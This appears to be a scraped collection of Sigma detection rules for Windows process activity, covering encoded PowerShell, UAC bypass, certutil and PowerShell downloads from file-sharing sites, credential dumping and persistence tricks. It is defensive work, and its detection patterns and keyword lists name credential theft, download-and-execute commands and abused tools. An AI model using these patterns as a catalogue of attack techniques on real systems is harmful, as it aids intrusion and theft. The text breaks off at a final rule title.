PowerShell Base64 Encoded Invoke Keyword
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects UTF-8 and UTF-16 Base64 encoded powershell ‘Invoke-’ calls
Detection logic
condition: all of selection_*
selection_cli_enc:
CommandLine|contains: ' -e'
selection_cli_invoke:
CommandLine|contains:
- SQBuAHYAbwBrAGUALQ
- kAbgB2AG8AawBlAC0A
- JAG4AdgBvAGsAZQAtA
- SW52b2tlL
- ludm9rZS
- JbnZva2Ut
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
UAC Bypass Abusing Winsat Path Parsing - Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detection logic
condition: selection
selection:
IntegrityLevel:
- High
- System
ParentCommandLine|contains: C:\Windows \system32\winsat.exe
ParentImage|endswith: \AppData\Local\Temp\system32\winsat.exe
Set Files as System Files Using Attrib.EXE
- source: sigma
- technicques:
- t1564
- t1564.001
Description
Detects the execution of “attrib” with the “+s” flag to mark files as system files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' +s '
selection_img:
- Image|endswith: \attrib.exe
- OriginalFileName: ATTRIB.EXE
Potential Encoded PowerShell Patterns In CommandLine
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects specific combinations of encoding methods in PowerShell via the commandline
Detection logic
condition: selection_img and (all of selection_to_* or 1 of selection_gen_*)
selection_gen_1:
CommandLine|contains|all:
- char
- join
selection_gen_2:
CommandLine|contains|all:
- split
- join
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
selection_to_1:
CommandLine|contains:
- ToInt
- ToDecimal
- ToByte
- ToUint
- ToSingle
- ToSByte
selection_to_2:
CommandLine|contains:
- ToChar
- ToString
- String
Suspicious File Download From IP Via Wget.EXE
- source: sigma
- technicques:
Description
Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
Detection logic
condition: all of selection_*
selection_ext:
CommandLine|endswith:
- .ps1
- .ps1'
- .ps1"
- .dat
- .dat'
- .dat"
- .msi
- .msi'
- .msi"
- .bat
- .bat'
- .bat"
- .exe
- .exe'
- .exe"
- .vbs
- .vbs'
- .vbs"
- .vbe
- .vbe'
- .vbe"
- .hta
- .hta'
- .hta"
- .dll
- .dll'
- .dll"
- .psm1
- .psm1'
- .psm1"
selection_flag:
- CommandLine|re: \s-O\s
- CommandLine|contains: --output-document
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \wget.exe
- OriginalFileName: wget.exe
selection_ip:
CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
Suspicious Scheduled Task Creation via Masqueraded XML File
- source: sigma
- technicques:
- t1036
- t1036.005
- t1053
- t1053.005
Description
Detects the creation of a scheduled task using the “-XML” flag with a file without the ‘.xml’ extension. This behavior could be indicative of potential defense evasion attempt during persistence
Detection logic
condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_extension_xml:
CommandLine|contains: .xml
filter_main_rundll32:
ParentCommandLine|contains|all:
- :\WINDOWS\Installer\MSI
- .tmp,zzzzInvokeManagedCustomActionOutOfProc
ParentImage|endswith: \rundll32.exe
filter_main_system_process:
IntegrityLevel: System
filter_optional_third_party:
ParentImage|endswith:
- :\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe
- :\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe
- :\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe
- :\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe
- :\Program Files\Dell\SupportAssist\pcdrcui.exe
selection_cli_create:
CommandLine|contains:
- /create
- -create
selection_cli_xml:
CommandLine|contains:
- /xml
- -xml
selection_img:
- Image|endswith: \schtasks.exe
- OriginalFileName: schtasks.exe
Suspicious HH.EXE Execution
- source: sigma
- technicques:
- t1047
- t1059
- t1059.001
- t1059.003
- t1059.005
- t1059.007
- t1218
- t1218.001
- t1218.010
- t1218.011
- t1566
- t1566.001
Description
Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
Detection logic
condition: all of selection_*
selection_img:
- OriginalFileName: HH.exe
- Image|endswith: \hh.exe
selection_paths:
CommandLine|contains:
- .application
- \AppData\Local\Temp\
- \Content.Outlook\
- \Downloads\
- \Users\Public\
- \Windows\Temp\
Suspicious Ping/Del Command Combination
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects a method often used by ransomware. Which combines the “ping” to wait a couple of seconds and then “del” to delete the file in question. Its used to hide the file responsible for the initial infection for example
Detection logic
condition: all of selection_*
selection_all:
CommandLine|contains|all:
- ping
- 'del '
selection_count:
CommandLine|contains|windash: ' -n '
selection_del_param:
CommandLine|contains|windash:
- ' -f '
- ' -q '
selection_nul:
CommandLine|contains: Nul
Suspicious MSDT Parent Process
- source: sigma
- technicques:
- t1036
- t1218
Description
Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
Detection logic
condition: all of selection_*
selection_msdt:
- Image|endswith: \msdt.exe
- OriginalFileName: msdt.exe
selection_parent:
ParentImage|endswith:
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \schtasks.exe
- \wmic.exe
- \wscript.exe
- \wsl.exe
HackTool - TruffleSnout Execution
- source: sigma
- technicques:
- t1482
Description
Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
Detection logic
condition: selection
selection:
- OriginalFileName: TruffleSnout.exe
- Image|endswith: \TruffleSnout.exe
Potential File Download Via MS-AppInstaller Protocol Handler
- source: sigma
- technicques:
- t1218
Description
Detects usage of the “ms-appinstaller” protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in “:\Users%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache<RANDOM-8-CHAR-DIRECTORY>”
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- ms-appinstaller://?source=
- http
Monitoring For Persistence Via BITS
- source: sigma
- technicques:
- t1197
Description
BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
Detection logic
condition: selection_img and (all of selection_cli_notify_* or all of selection_cli_add_*)
selection_cli_add_1:
CommandLine|contains: /Addfile
selection_cli_add_2:
CommandLine|contains:
- 'http:'
- 'https:'
- 'ftp:'
- 'ftps:'
selection_cli_notify_1:
CommandLine|contains: /SetNotifyCmdLine
selection_cli_notify_2:
CommandLine|contains:
- '%COMSPEC%'
- cmd.exe
- regsvr32.exe
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe
Potentially Suspicious Command Targeting Teams Sensitive Files
- source: sigma
- technicques:
- t1528
Description
Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_locations:
Image|endswith: \Microsoft\Teams\current\Teams.exe
selection:
CommandLine|contains:
- \Microsoft\Teams\Cookies
- \Microsoft\Teams\Local Storage\leveldb
HackTool - Pypykatz Credentials Dumping Activity
- source: sigma
- technicques:
- t1003
- t1003.002
Description
Detects the usage of “pypykatz” to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- live
- registry
Image|endswith:
- \pypykatz.exe
- \python.exe
Compress Data and Lock With Password for Exfiltration With WINZIP
- source: sigma
- technicques:
- t1560
- t1560.001
Description
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
Detection logic
condition: all of selection*
selection_other:
CommandLine|contains:
- ' -min '
- ' -a '
selection_password:
CommandLine|contains: -s"
selection_winzip:
CommandLine|contains:
- winzip.exe
- winzip64.exe
Renamed NirCmd.EXE Execution
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects the execution of a renamed “NirCmd.exe” binary based on the PE metadata fields.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_img:
Image|endswith:
- \nircmd.exe
- \nircmdc.exe
selection:
OriginalFileName: NirCmd.exe
Suspicious Active Directory Database Snapshot Via ADExplorer
- source: sigma
- technicques:
- t1003
- t1003.003
- t1552
- t1552.001
Description
Detects the execution of Sysinternals ADExplorer with the “-snapshot” flag in order to save a local copy of the active directory database to a suspicious directory.
Detection logic
condition: all of selection_*
selection_flag:
CommandLine|contains: snapshot
selection_img:
- Image|endswith: \ADExplorer.exe
- OriginalFileName: AdExp
selection_paths:
CommandLine|contains:
- \Downloads\
- \Users\Public\
- \AppData\
- \Windows\Temp\
Sysinternals PsSuspend Execution
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
Detection logic
condition: selection
selection:
- OriginalFileName: pssuspend.exe
- Image|endswith:
- \pssuspend.exe
- \pssuspend64.exe
Suspicious Runscripthelper.exe
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects execution of powershell scripts via Runscripthelper.exe
Detection logic
condition: selection
selection:
CommandLine|contains: surfacecheck
Image|endswith: \Runscripthelper.exe
Script Interpreter Execution From Suspicious Folder
- source: sigma
- technicques:
- t1059
Description
Detects a suspicious script execution in temporary folders or folders accessible by environment variables
Detection logic
condition: 1 of selection_proc_* and 1 of selection_folders_*
selection_folders_1:
CommandLine|contains:
- :\Perflogs\
- :\Users\Public\
- \AppData\Local\Temp
- \AppData\Roaming\Temp
- \Temporary Internet
- \Windows\Temp
selection_folders_2:
- CommandLine|contains|all:
- :\Users\
- \Favorites\
- CommandLine|contains|all:
- :\Users\
- \Favourites\
- CommandLine|contains|all:
- :\Users\
- \Contacts\
selection_proc_flags:
CommandLine|contains:
- ' -ep bypass '
- ' -ExecutionPolicy bypass '
- ' -w hidden '
- '/e:javascript '
- '/e:Jscript '
- '/e:vbscript '
selection_proc_image:
Image|endswith:
- \cscript.exe
- \mshta.exe
- \wscript.exe
selection_proc_original:
OriginalFileName:
- cscript.exe
- mshta.exe
- wscript.exe
Run PowerShell Script from ADS
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Detects PowerShell script execution from Alternate Data Stream (ADS)
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- Get-Content
- -Stream
Image|endswith:
- \powershell.exe
- \pwsh.exe
ParentImage|endswith:
- \powershell.exe
- \pwsh.exe
Private Keys Reconnaissance Via CommandLine Tools
- source: sigma
- technicques:
- t1552
- t1552.004
Description
Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
Detection logic
condition: selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or
selection_findstr)
selection_cmd_cli:
CommandLine|contains: 'dir '
selection_cmd_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
selection_ext:
CommandLine|contains:
- .key
- .pgp
- .gpg
- .ppk
- .p12
- .pem
- .pfx
- .cer
- .p7b
- .asc
selection_findstr:
- Image|endswith: \findstr.exe
- OriginalFileName: FINDSTR.EXE
selection_pwsh_cli:
CommandLine|contains: 'Get-ChildItem '
selection_pwsh_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
Suspicious Git Clone
- source: sigma
- technicques:
- t1593
- t1593.003
Description
Detects execution of “git” in order to clone a remote repository that contain suspicious keywords which might be suspicious
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ' clone '
- 'git-remote-https '
selection_img:
- Image|endswith:
- \git.exe
- \git-remote-https.exe
- OriginalFileName: git.exe
selection_keyword:
CommandLine|contains:
- exploit
- Vulns
- vulnerability
- RemoteCodeExecution
- Invoke-
- CVE-
- poc-
- ProofOfConcept
- proxyshell
- log4shell
- eternalblue
- eternal-blue
- MS17-
Uncommon AddinUtil.EXE CommandLine Execution
- source: sigma
- technicques:
- t1218
Description
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_addinroot:
CommandLine|contains:
- -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA
- -AddInRoot:C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA
- -PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA
- -PipelineRoot:C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA
selection_cli:
CommandLine|contains:
- '-AddInRoot:'
- '-PipelineRoot:'
selection_img:
- Image|endswith: \addinutil.exe
- OriginalFileName: AddInUtil.exe
Suspicious TSCON Start as SYSTEM
- source: sigma
- technicques:
- t1219
Description
Detects a tscon.exe start as LOCAL SYSTEM
Detection logic
condition: selection
selection:
Image|endswith: \tscon.exe
User|contains:
- AUTHORI
- AUTORI
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
- source: sigma
- technicques:
- t1216
Description
Detects the use of the Microsoft signed script “CL_mutexverifiers” to proxy the execution of additional PowerShell script commands
Detection logic
condition: all of selection_*
selection_pwsh:
CommandLine|contains: ' -nologo -windowstyle minimized -file '
Image|endswith: \powershell.exe
ParentImage|endswith:
- \powershell.exe
- \pwsh.exe
selection_temp:
CommandLine|contains:
- \AppData\Local\Temp\
- \Windows\Temp\
Potential DLL Sideloading Via DeviceEnroller.EXE
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named “ShellChromeAPI.dll”. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: /PhoneDeepLink
selection_img:
- Image|endswith: \deviceenroller.exe
- OriginalFileName: deviceenroller.exe
Renamed PingCastle Binary Execution
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects the execution of a renamed “PingCastle” binary based on the PE metadata fields.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_img:
Image|endswith:
- \PingCastleReporting.exe
- \PingCastleCloud.exe
- \PingCastle.exe
selection:
- OriginalFileName:
- PingCastleReporting.exe
- PingCastleCloud.exe
- PingCastle.exe
- CommandLine|contains:
- --scanner aclcheck
- --scanner antivirus
- --scanner computerversion
- --scanner foreignusers
- --scanner laps_bitlocker
- --scanner localadmin
- --scanner nullsession
- --scanner nullsession-trust
- --scanner oxidbindings
- --scanner remote
- --scanner share
- --scanner smb
- --scanner smb3querynetwork
- --scanner spooler
- --scanner startup
- --scanner zerologon
- CommandLine|contains: --no-enum-limit
- CommandLine|contains|all:
- --healthcheck
- --level Full
- CommandLine|contains|all:
- --healthcheck
- '--server '
PrintBrm ZIP Creation of Extraction
- source: sigma
- technicques:
- t1105
- t1564
- t1564.004
Description
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- ' -f'
- .zip
Image|endswith: \PrintBrm.exe
Suspicious Msiexec Quiet Install From Remote Location
- source: sigma
- technicques:
- t1218
- t1218.007
Description
Detects usage of Msiexec.exe to install packages hosted remotely quietly
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash:
- -i
- -package
- -a
- -j
selection_img:
- Image|endswith: \msiexec.exe
- OriginalFileName: msiexec.exe
selection_quiet:
CommandLine|contains|windash: -q
selection_remote:
CommandLine|contains:
- http
- \\\\
Filter Driver Unloaded Via Fltmc.EXE
- source: sigma
- technicques:
- t1070
- t1562
- t1562.002
Description
Detect filter driver unloading activity via fltmc.exe
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_avira:
CommandLine|endswith: unload rtp_filesystem_filter
selection_cli:
CommandLine|contains: unload
selection_img:
- Image|endswith: \fltMC.exe
- OriginalFileName: fltMC.exe
Suspicious Spool Service Child Process
- source: sigma
- technicques:
- t1068
- t1203
Description
Detects suspicious print spool service (spoolsv.exe) child processes.
Detection logic
condition: spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter)
or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter)
or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_*
)
spoolsv:
IntegrityLevel: System
ParentImage|endswith: \spoolsv.exe
suspicious_cmd:
Image|endswith: \cmd.exe
suspicious_cmd_filter:
CommandLine|contains:
- .spl
- route add
- program files
suspicious_net:
Image|endswith:
- \net.exe
- \net1.exe
suspicious_net_filter:
CommandLine|contains: start
suspicious_netsh:
Image|endswith: \netsh.exe
suspicious_netsh_filter:
CommandLine|contains:
- add portopening
- rule name
suspicious_powershell:
Image|endswith:
- \powershell.exe
- \pwsh.exe
suspicious_powershell_filter:
CommandLine|contains: .spl
suspicious_rundll32_cli:
CommandLine|endswith: rundll32.exe
suspicious_rundll32_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
suspicious_unrestricted:
Image|endswith:
- \gpupdate.exe
- \whoami.exe
- \nltest.exe
- \taskkill.exe
- \wmic.exe
- \taskmgr.exe
- \sc.exe
- \findstr.exe
- \curl.exe
- \wget.exe
- \certutil.exe
- \bitsadmin.exe
- \accesschk.exe
- \wevtutil.exe
- \bcdedit.exe
- \fsutil.exe
- \cipher.exe
- \schtasks.exe
- \write.exe
- \wuauclt.exe
- \systeminfo.exe
- \reg.exe
- \query.exe
PowerShell Base64 Encoded FromBase64String Cmdlet
- source: sigma
- technicques:
- t1059
- t1059.001
- t1140
Description
Detects usage of a base64 encoded “FromBase64String” cmdlet in a process command line
Detection logic
condition: selection
selection:
- CommandLine|base64offset|contains: ::FromBase64String
- CommandLine|contains:
- OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA
- oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA
- 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw
Suspicious Kernel Dump Using Dtrace
- source: sigma
- technicques:
- t1082
Description
Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
Detection logic
condition: 1 of selection*
selection_obfuscated:
CommandLine|contains|all:
- syscall:::return
- lkd(
selection_plain:
CommandLine|contains: lkd(0)
Image|endswith: \dtrace.exe
Suspicious DumpMinitool Execution
- source: sigma
- technicques:
- t1003
- t1003.001
- t1036
Description
Detects suspicious ways to use the “DumpMinitool.exe” binary
Detection logic
cmd_has_flags:
CommandLine|contains:
- ' Full'
- ' Mini'
- ' WithHeap'
condition: selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags
and not filter_cmd_misses_flags ) )
filter_cmd_misses_flags:
CommandLine|contains: --dumpType
filter_folder:
Image|contains:
- \Microsoft Visual Studio\
- \Extensions\
selection:
- Image|endswith:
- \DumpMinitool.exe
- \DumpMinitool.x86.exe
- \DumpMinitool.arm64.exe
- OriginalFileName:
- DumpMinitool.exe
- DumpMinitool.x86.exe
- DumpMinitool.arm64.exe
susp_flags:
CommandLine|contains: .txt
Whoami.EXE Execution With Output Option
- source: sigma
- technicques:
- t1033
Description
Detects the execution of “whoami.exe” with the “/FO” flag to choose CSV as output format or with redirection options to export the results to a file for later use.
Detection logic
condition: all of selection_main_* or selection_special
selection_main_cli:
CommandLine|contains:
- ' /FO CSV'
- ' -FO CSV'
selection_main_img:
- Image|endswith: \whoami.exe
- OriginalFileName: whoami.exe
selection_special:
CommandLine|contains: whoami*>
Suspicious Child Process Of BgInfo.EXE
- source: sigma
- technicques:
- t1059
- t1059.005
- t1202
- t1218
Description
Detects suspicious child processes of “BgInfo.exe” which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Detection logic
condition: all of selection_*
selection_child:
- Image|endswith:
- \calc.exe
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \notepad.exe
- \powershell.exe
- \pwsh.exe
- \wscript.exe
- Image|contains:
- \AppData\Local\
- \AppData\Roaming\
- :\Users\Public\
- :\Temp\
- :\Windows\Temp\
- :\PerfLogs\
selection_parent:
ParentImage|endswith:
- \bginfo.exe
- \bginfo64.exe
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
- source: sigma
- technicques:
- t1059
- t1059.005
- t1615
Description
Detects execution of the built-in script located in “C:\Windows\System32\gatherNetworkInfo.vbs”. Which can be used to gather information about the target machine
Detection logic
condition: selection and not filter
filter:
Image|endswith:
- \cscript.exe
- \wscript.exe
selection:
CommandLine|contains: gatherNetworkInfo.vbs
COM Object Execution via Xwizard.EXE
- source: sigma
- technicques:
- t1218
Description
Detects the execution of Xwizard tool with the “RunWizard” flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry.
Detection logic
condition: all of selection_* or (selection_cli and not selection_img)
selection_cli:
CommandLine: RunWizard
CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\}
selection_img:
- Image|endswith: \xwizard.exe
- OriginalFileName: xwizard.exe
Renamed AutoHotkey.EXE Execution
- source: sigma
- technicques:
Description
Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
Detection logic
condition: selection and not filter
filter:
- Image|endswith:
- \AutoHotkey.exe
- \AutoHotkey32.exe
- \AutoHotkey32_UIA.exe
- \AutoHotkey64.exe
- \AutoHotkey64_UIA.exe
- \AutoHotkeyA32.exe
- \AutoHotkeyA32_UIA.exe
- \AutoHotkeyU32.exe
- \AutoHotkeyU32_UIA.exe
- \AutoHotkeyU64.exe
- \AutoHotkeyU64_UIA.exe
- Image|contains: \AutoHotkey
selection:
- Product|contains: AutoHotkey
- Description|contains: AutoHotkey
- OriginalFileName:
- AutoHotkey.exe
- AutoHotkey.rc
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
Detection logic
condition: all of selection_*
selection_flags:
CommandLine|contains:
- 'urlcache '
- 'verifyctl '
selection_http:
CommandLine|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Disable Important Scheduled Task
- source: sigma
- technicques:
- t1489
Description
Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
Detection logic
condition: all of schtasks_*
schtasks_exe:
CommandLine|contains:
- \Windows\SystemRestore\SR
- \Windows\Windows Defender\
- \Windows\BitLocker
- \Windows\WindowsBackup\
- \Windows\WindowsUpdate\
- \Windows\UpdateOrchestrator\
- \Windows\ExploitGuard
CommandLine|contains|all:
- /Change
- /TN
- /disable
Image|endswith: \schtasks.exe
Suspicious CustomShellHost Execution
- source: sigma
- technicques:
- t1216
Description
Detects the execution of CustomShellHost binary where the child isn’t located in ‘C:\Windows\explorer.exe’
Detection logic
condition: selection and not filter
filter:
Image: C:\Windows\explorer.exe
selection:
ParentImage|endswith: \CustomShellHost.exe
Automated Collection Command Prompt
- source: sigma
- technicques:
- t1119
- t1552
- t1552.001
Description
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Detection logic
condition: selection_ext and 1 of selection_other_*
selection_ext:
CommandLine|contains:
- .doc
- .docx
- .xls
- .xlsx
- .ppt
- .pptx
- .rtf
- .pdf
- .txt
selection_other_dir:
CommandLine|contains|all:
- 'dir '
- ' /b '
- ' /s '
selection_other_findstr:
CommandLine|contains:
- ' /e '
- ' /si '
OriginalFileName: FINDSTR.EXE
Suspicious Child Process of AspNetCompiler
- source: sigma
- technicques:
- t1127
Description
Detects potentially suspicious child processes of “aspnet_compiler.exe”.
Detection logic
condition: all of selection_*
selection_child:
- Image|endswith:
- \calc.exe
- \notepad.exe
- Image|contains:
- \Users\Public\
- \AppData\Local\Temp\
- \AppData\Local\Roaming\
- :\Temp\
- :\Windows\Temp\
- :\Windows\System32\Tasks\
- :\Windows\Tasks\
selection_parent:
ParentImage|endswith: \aspnet_compiler.exe
Renamed SysInternals DebugView Execution
- source: sigma
- technicques:
- t1588
- t1588.002
Description
Detects suspicious renamed SysInternals DebugView execution
Detection logic
condition: selection and not filter
filter:
Image|endswith: \Dbgview.exe
OriginalFileName: Dbgview.exe
selection:
Product: Sysinternals DebugView
Service DACL Abuse To Hide Services Via Sc.EXE
- source: sigma
- technicques:
- t1574
- t1574.011
Description
Detects usage of the “sc.exe” utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- sdset
- DCLCWPDTSD
selection_img:
- Image|endswith: \sc.exe
- OriginalFileName: sc.exe
Security Privileges Enumeration Via Whoami.EXE
- source: sigma
- technicques:
- t1033
Description
Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ' /priv'
- ' -priv'
selection_img:
- Image|endswith: \whoami.exe
- OriginalFileName: whoami.exe
Script Event Consumer Spawning Process
- source: sigma
- technicques:
- t1047
Description
Detects a suspicious child process of Script Event Consumer (scrcons.exe).
Detection logic
condition: selection
selection:
Image|endswith:
- \svchost.exe
- \dllhost.exe
- \powershell.exe
- \pwsh.exe
- \wscript.exe
- \cscript.exe
- \schtasks.exe
- \regsvr32.exe
- \mshta.exe
- \rundll32.exe
- \msiexec.exe
- \msbuild.exe
ParentImage|endswith: \scrcons.exe
Renamed Whoami Execution
- source: sigma
- technicques:
- t1033
Description
Detects the execution of whoami that has been renamed to a different name to avoid detection
Detection logic
condition: selection and not filter
filter:
Image|endswith: \whoami.exe
selection:
OriginalFileName: whoami.exe
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
- source: sigma
- technicques:
- t1059
Description
Detects execution of the “VMwareToolBoxCmd.exe” with the “script” and “set” flag to setup a specific script to run for a specific VM state
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' script '
- ' set '
selection_img:
- Image|endswith: \VMwareToolBoxCmd.exe
- OriginalFileName: toolbox-cmd.exe
Suspicious RDP Redirect Using TSCON
- source: sigma
- technicques:
- t1021
- t1021.001
- t1563
- t1563.002
Description
Detects a suspicious RDP session redirect using tscon.exe
Detection logic
condition: selection
selection:
CommandLine|contains: ' /dest:rdp-tcp#'
Potentially Suspicious GoogleUpdate Child Process
- source: sigma
- technicques:
Description
Detects potentially suspicious child processes of “GoogleUpdate.exe”
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_image_null:
Image: null
filter_main_known_legit:
- Image|contains: \Google
- Image|endswith:
- \setup.exe
- chrome_updater.exe
- chrome_installer.exe
selection:
ParentImage|endswith: \GoogleUpdate.exe
AspNetCompiler Execution
- source: sigma
- technicques:
- t1127
Description
Detects execution of “aspnet_compiler.exe” which can be abused to compile and execute C# code.
Detection logic
condition: selection
selection:
Image|contains:
- C:\Windows\Microsoft.NET\Framework\
- C:\Windows\Microsoft.NET\Framework64\
Image|endswith: \aspnet_compiler.exe
Potential MsiExec Masquerading
- source: sigma
- technicques:
- t1036
- t1036.005
Description
Detects the execution of msiexec.exe from an uncommon directory
Detection logic
condition: selection and not filter
filter:
Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- C:\Windows\WinSxS\
selection:
- Image|endswith: \msiexec.exe
- OriginalFileName: \msiexec.exe
Suspicious Calculator Usage
- source: sigma
- technicques:
- t1036
Description
Detects suspicious use of ‘calc.exe’ with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
Detection logic
condition: selection_1 or ( selection_2 and not filter_main_known_locations )
filter_main_known_locations:
Image|contains:
- :\Windows\System32\
- :\Windows\SysWOW64\
- :\Windows\WinSxS\
selection_1:
CommandLine|contains: '\calc.exe '
selection_2:
Image|endswith: \calc.exe
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
- source: sigma
- technicques:
Description
Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
Detection logic
condition: all of selection_*
selection_download:
CommandLine|contains:
- .DownloadString(
- .DownloadFile(
- 'Invoke-WebRequest '
- 'iwr '
- 'wget '
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
selection_websites:
CommandLine|contains:
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
Potential File Overwrite Via Sysinternals SDelete
